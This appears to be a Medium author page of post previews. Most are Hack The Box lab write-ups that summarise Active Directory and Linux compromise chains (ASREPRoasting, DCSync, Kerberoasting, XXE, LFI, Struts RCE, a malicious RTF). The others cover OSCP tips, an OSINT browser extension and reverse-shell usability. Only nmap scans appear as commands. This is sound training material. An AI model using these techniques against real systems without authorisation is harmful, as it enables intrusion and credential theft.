Image for post
Image for post

Summary

Forest is a windows Active Directory Domain Controller which allows limited Anonymous access via SMB, RPC and LDAP. This access allowed for enumeration of the domain to identify a service account which does not require Kerberos preauthentication. This configuration allows unauthenticated kerberos requests to be made for this service account and return an encrypted response that can be cracked offline to reveal the account’s password in a technique known as ASREPRoasting.

Privileges were escalated using this account to grant itself DcSync privileges based upon inherited group permissions. DcSync emulates the legitimate behavior of how Domain Controllers replicate data between eachother called Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled. DcSync was leveraged to extract the Administrator account’s hash to gain elevated privileges. …


Image for post
Image for post
The ominous Offensive Security logo

Introduction

Many OSCP write-ups focus on discussing the time spent in the PWK course and labs. I spent a significant amount of time preparing for this course before enrolling and I was able to pass the exam with only 30 days of lab access. Feel free to skip past the following section and check out the 5 tips that prepared me the most for this course!

My OSCP Experience

I first heard about OSCP two years ago and knew it was something I wanted to achieve. There was something unique and fascinating about the format: A 24hr exam. …


Image for post
Image for post

Summary

Sputnik is a browser extension which I designed to quickly and easily search IPs, Domains, File Hashes, and URLs using free Open Source Intelligence (OSINT) resources.

As an Incident Response Analyst, this tool has enabled streamlined pivoting on artifacts gathered during investigations. Being able to quickly gather OSINT helps provide context to an investigation and can help when developing a narrative for an incident.

I designed this with convenience and efficiency in mind. In order to use the extension, simply highlight the artifact you wish to search and right click to choose an OSINT tool. You can also right click on hyperlinks, images, audio, and video content and the domain will be extracted from these artifacts. In most cases, you will be redirected straight to results. …


Image for post
Image for post

Summary

Active is a windows Active Directory server which contained a Groups.xml file in an SMB share accessible through Anonymous logon. This file contained a Group Policy Preference password for a user account which was then cracked in order to gain access to a service account with read access to the user flag.

Privileges were escalated by fetching Service Principal Names associated with the service accounts and retrieve the Administrator’s Kerberos 5 hash. This was able to be cracked and granted read/write access to the filesystem as well as an interactive shell via arbitrary service installation/execution via tools such as psexec.

Recon

I began recon on this host with an nmap scan checking Service Versions and running Default Scripts on the top 1000 most common…


Image for post
Image for post

Summary

Reel is a Windows host running an FTP service which allowed Anonymous access. This was leveraged to access files on the system in order to enumerate a user email and identify that the user was expecting to receive .rtf files via email. A malicious .rtf file exploiting CVE-2017-0199 was then generated and sent to the user via Reel’s SMTP server. This exploit granted user access to Reel. Encrypted user credentials were discovered in an .xml document and were deciphered to gain persistence via SSH.

Privileges were escalated on the host via artifacts of a BloodHound Active Directory audit discovered on the host. Active Directory configurations were leveraged using PowerView (now a part of PowerSploit) to gain access to another user account with read access to a file containing credentials to the Administrator Account. …


Image for post
Image for post

Summary

DevOops is a Linux host running a web service with file uploads vulnerable to XML External Entity Processing. This was leveraged to access files on the system in order to enumerate users, read bash history, and retrieve SSH keys. A root shell was gained on the host by finding a root SSH key from the bash history of a user.

Recon

I began recon on this host with an nmap scan checking Service Versions and running Default Scripts on the top 1000 most common ports:

nmap -sV -sC 10.10.10.91
nmap

This returned 2 services: SSH on port 22 and HTTP on port 5000. Next, I decided to enumerate the web service with gobuster to return additional web…


Image for post
Image for post

Summary

Sunday is a Linux host running an SSH server with weak user credentials. This was leveraged to gain access to the machine and recover a backup of the /etc/shadow file. This backup file was used to crack the password hash of an account that was able to wget files with elevated privileges. This was leveraged to both exfiltrate the root flag and gain a root shell on the system.

Recon

I began recon on this host with an nmap scan checking Service Versions and running Default Scripts on the top 1000 most common ports:

nmap -sV -sC 10.10.10.76
that’s it?

This did not return much to work with so I pivoted to UDP to see if there was something to be found there. …


Image for post
Image for post

Summary

Poison is a Linux host running a web server vulnerable to local file inclusion. This was leveraged to enumerate local users and recover a file containing an encoded credential. These were combined to gain SSH access to the machine. Local enumeration returned a VNC process running as root that only accepted local connections. Port forwarding combined with a key recovered from the host returned a terminal over VNC with root privileges.

Recon

I began recon on this host with a scan to enumerate Service Versions and run Default Scripts on the 1000 common ports that nmap checks by default:

nmap -sV -sC 10.10.10.84 …


Image for post
Image for post
the struggle is real

As excited as I initially am whenever I catch a reverse shell with netcat, my enthusiasm quickly diminishes when I remember how terribly limited these shells tend to be. So I’ve decided to compile a list of helpful commands that make these shells much more useable. Hopefully after reading this, you will be able to navigate around your reverse shells as easily as an ssh connection.

1. Spawn TTY with Python

This is probably singlehandedly the biggest improvement you can make to your netcat shell.


Image for post
Image for post

Summary

Stratosphere is a Linux host running a web server vulnerable to CVE 2017–5638: a critical vulnerability in Apache Struts 2 that was leveraged to gain remote code execution as a low-privileged user on the system. Local enumeration returned credentials that were used to access a local instance of MySQL. This database contained credentials that were then used to SSH onto the machine as a user with sudo privileges to execute a single Python 2 script. Python 2’s input sanitization and library import functionality were exploited to gain root privileges on the system.

Recon

I began recon on this host with a full port scan using nmap with a few arguments to improve the speed of this…

About

Mitch Moser

digital brain | analog heart

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store